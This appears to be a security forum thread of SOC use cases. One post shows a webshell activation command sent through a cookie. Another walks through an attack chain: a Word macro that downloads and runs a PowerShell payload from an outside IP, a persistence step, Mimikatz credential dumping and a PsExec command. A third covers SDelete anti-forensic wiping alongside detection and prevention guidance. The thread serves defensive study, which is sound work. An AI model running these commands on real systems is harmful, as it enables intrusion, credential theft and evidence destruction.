Announcement

Collapse
No announcement yet.

SOC Usecase

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    SOC Usecase

    Activate WebShell Via special cookie

    PHP Code:
    curl ---cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami 
    Tags: None
  • #2
    APT-1 attacks on Westinghouse Electric Company

    initial access
    - phishing
    - word with VBA , Macro Enabled

    HTML Code:
    Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub

    Dropper : C:\Users\Public\chrome_upd.exe

    [ Persist ]
    Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

    POST request every 30s to http://updater[.]info/report.php

    [ Lateral Movement ]
    PsExec + Mimikatz

    HTML Code:
    .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
[HTML]
    psexec.exe \\TARGET -u admin -p password cmd.exe[/HTML]

    [ Data Gathering and Exfiltration ]

    powershell + RAR

    Comment

    • #3
      Auditd and Log Forwarders Status

      coming soon .....

      Comment

      • #4
        Sysinternal Tools - SDelete ( Anti Forensic )
        -----------

        Scenario: After privilege escalation on a Windows server, an operator wants to hide evidence of tool staging and exfil scripts.​

        Actions with SDelete:​

        Code:
        sdelete -p 5 C:\Users\Admin\Desktop\payload.exe
sdelete -z C:
          • Securely wipes dropped payloads.
          • Cleans free space to erase deleted traces.
        • Goal: Make forensic recovery of tools and temp artifacts much harder.

        ⚠️ Limitation: On SSDs, due to wear leveling, deleted data may still persist in flash cells.


        ------------
        Blue Team (Defensive / Detection & Response)
        • Why monitor? Attackers or insiders may use SDelete to wipe logs or payloads.
        • Detection methods:
          • Process Creation Logs (Sysmon Event ID 1, Windows Event ID 4688):
            • Look for execution of sdelete.exe or renamed copies.
            • Example Splunk SPL:
        Code:
        ​
index=windows (process_name="sdelete.exe" OR command_line="*sdelete*")
          • Unusual Disk Activity:
            • Sudden large writes to free space (-z / -c flags).
            • Disk I/O spikes without corresponding business processes.
          • Fileless Detection:
            • Monitor for tools dropped in C:\Windows\Temp\ or user profile paths, then executed.
        • Prevention:
          • Block Sysinternals tools not needed for business via AppLocker / WDAC.
          • Alert on unauthorized use in servers and critical endpoints.


        Comment

        Previous template Next
        Working...
        X